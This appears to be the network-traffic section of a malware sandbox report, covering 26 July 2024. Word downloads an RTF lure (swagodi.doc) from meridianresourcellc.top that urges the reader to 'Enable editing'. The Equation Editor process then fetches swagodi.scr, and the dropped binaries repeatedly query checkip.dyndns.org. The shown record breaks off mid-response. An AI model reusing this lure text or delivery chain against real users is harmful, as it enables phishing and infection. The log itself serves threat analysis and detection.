                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              4           192.168.2.22  49180        193.122.6.168   80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:39.872224092 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:41.517668009 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d799f47d8bfb2cb5131f520a3987fe38
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              5           192.168.2.22  49182        193.122.6.168   80                3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:41.424787045 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:42.081131935 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 73915a61552b4bb9a2d257ac1a11b9d0
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:42.291476011 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 73915a61552b4bb9a2d257ac1a11b9d0
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              6           192.168.2.22  49184        132.226.8.169   80                3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:42.547310114 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:43.327135086 CEST  272  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:43.539527893 CEST  272  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              7           192.168.2.22  49185        193.122.6.168   80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:42.548789978 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:44.186233044 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 5591e8efab600566dfc849052e1c1a8b
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:44.395447969 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 5591e8efab600566dfc849052e1c1a8b
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              8           192.168.2.22  49187        158.101.44.242  80                3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:44.480416059 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:45.059883118 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 25b1603cff26c8871a24ad2d29248270
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              9           192.168.2.22  49190        193.122.6.168   80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:45.178761959 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:46.833507061 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ec5a3eca9f3b6b326c167937f545a709
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:47.043627977 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ec5a3eca9f3b6b326c167937f545a709
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              10          192.168.2.22  49191        132.226.247.73  80                3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:45.711668968 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:46.386826992 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e11c1a38741ece346ca89fb883e912b
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:46.605454922 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e11c1a38741ece346ca89fb883e912b
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              11          192.168.2.22  49195        193.122.130.0   80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:47.523673058 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:47.997226000 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e4976ce56f7811441ff0405c1bd3f8c
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:48.203905106 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e4976ce56f7811441ff0405c1bd3f8c
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              12          192.168.2.22  49197        132.226.247.73  80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:48.703653097 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:49.378026962 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bbb58a33e06dad190c725d08fbca39d
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:49.587779999 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bbb58a33e06dad190c725d08fbca39d
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              13          192.168.2.22  49199        132.226.247.73  80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:50.071681023 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:51.685719967 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.685988903 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.686393023 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.686778069 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              14          192.168.2.22  49201        193.122.130.0   80                2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Jul 26, 2024 23:45:52.398821115 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:52.860874891 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9b01ea5599a44c6e7894686bf275181f
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:53.071516037 CEST | 320 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9b01ea5599a44c6e7894686bf275181f
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.22 | 49161 | 104.21.52.88 | 443 | 748 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:05 UTC | 145 | OUT | OPTIONS / HTTP/1.1
                                              User-Agent: Microsoft Office Protocol Discovery
                                              Host: meridianresourcellc.top
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:05 UTC | 719 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:05 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JSdlzVSvhbffSLDxpcUNtAwB1nj6QlHKiYOWrRI2O5Tzf6BmOo45RlFZRM2a4FsXeqN4pYpjX2L4xYUpmQoGJ85pHEMDL2VTQWbDD1FGR%2BdeuloELuGlVQZqvdH1Pjyy6KQeHxxQwcvcfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793222f1c0f90-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.22 | 49162 | 172.67.197.72 | 443 | 748 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:08 UTC | 135 | OUT | HEAD /swagodi.doc HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:08 UTC | 853 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:08 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66361
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25Bti9iVQ%2B%2Ftk8mT3m2hWfizwWK3pyWoosxGtt8QefgPfgtIQAPWCWVUrZkS03NNjtLnsi1FqgogWuITVYLM%2BablyKCDeIfVFNrrlf7Mp5v4jh0E2kZ9a9YV%2B7DNti8XC58P9UYl561RoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a979333f9fc4375-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              2 | 192.168.2.22 | 49163 | 104.21.52.88 | 443
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:12 UTC | 140 | OUT | OPTIONS / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              translate: f
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:13 UTC | 729 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:13 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjW7GyfMpPq3HDavzIlWnOqIeVHIi2SA4Q2XFkzFGkvYIjteaf5K125v8a5kTvnAG%2Bby0Xy0jTiKVXx15%2B3yoQ%2Fe4qPlw56vWi9BlLV%2FQOeQL3sQBudlZZoKI%2FqhLcj6ndRbalpNjU%2Bkmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97934f5a51197c-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              3 | 192.168.2.22 | 49164 | 104.21.52.88 | 443
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:13 UTC | 170 | OUT | PROPFIND / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              Depth: 0
                                              translate: f
                                              Content-Length: 0
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:14 UTC | 742 | IN | HTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:14 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLYGWhyaPAdzx81SI%2Bx4I5Y1g1JcsrbCrwjcKftRSAUfOLX7tRhMd1a4qxuqrNQmdyq52V0kDVqK2r3GdIof2zP2uFNLni%2FaWxnfSdk1fZDb2CrJxWRXdfi3MYE47H1jbeufSXlD58Bdfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793568fcd43a5-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:14 UTC | 231 | IN | Data Ascii: e1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              4 | 192.168.2.22 | 49165 | 104.21.52.88 | 443
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:15 UTC | 170 | OUT | PROPFIND / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              Depth: 0
                                              translate: f
                                              Content-Length: 0
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:15 UTC | 742 | IN | HTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSgsQGDe5jhP50qqbdlZGxgDKSPLkhvMkg89hwWfJiEzjRXz6Kapz5hZYaoaJmmp4WU1qWlZzeD15gVYSlMHq9fcjzRq3emEGjAuu8WArJgQYX%2FyddiWPwmmXpbURQsOd%2BgnOxcbVvv90g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97935f485042a7-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:15 UTC | 231 | IN | Data Ascii: e1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.22 | 49166 | 104.21.52.88 | 443 | 748 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:16 UTC | 365 | OUT | GET /swagodi.doc HTTP/1.1
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              Host: meridianresourcellc.top
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:16 UTC | 847 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:16 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66369
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBHI3ikGGI8lpg0fufmVZzJ%2BexoDZSkNGjkLtVCLHiD2SK0M73amRRr6pjDa2B1MGkCPA0D95x8nWlwck9QpL5WG4yJXbVc4MaXiWMB2YuamHfd5btGDnSNAw7v5ro3OXGgMsVkLu1ybZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793673f7fc327-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:16 UTC | 522 | IN | Data Ascii: {\rtf1{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}{\825440998please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fairly stated in accordance


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.22 | 49167 | 104.21.52.88 | 443 | 748 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:18 UTC | 154 | OUT | HEAD /swagodi.doc HTTP/1.1
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: meridianresourcellc.top
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:18 UTC  859                IN         HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:18 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66371
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=em5IUTDkNWkl8HXCcoopv5kVxg5%2B6d0ml85snYrjbdnIm9xJjZyCK%2Bctuoc8qEXdzJ6DuEDMhQdB5%2BRWKxMZZXKFJ0A%2BL6n10rUiskFRWesgKW9mul%2FDJqRyulv%2Bo8Kk%2FZErk9aiLgUT3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a979370cfce7cf9-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              7           192.168.2.22  49168        104.21.52.88    443               3408  C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:20 UTC  321                OUT        GET /swagodi.scr HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: meridianresourcellc.top
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:20 UTC  787                IN         HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:20 GMT
                                              Content-Type: application/x-silverlight
                                              Content-Length: 683016
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 12:01:08 GMT
                                              ETag: "a6c08-61e25444207e0"
                                              Accept-Ranges: bytes
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xXZkEQvAtIqq3yu0%2BSEv%2FWYlNsMq9zX5bCNI3VAIw1h9yEpOadLa%2F92ptRSSWYOgt3h9S30uc9rkJzP2aDLMZKJWvSkD%2F16%2B5qdnqb80Us64ZLnwWMDrPCQvYfIwOe4cNo%2BDDh5WIl9B6w%3D%3D"}],"group":"cf-nel","max_age":604800}
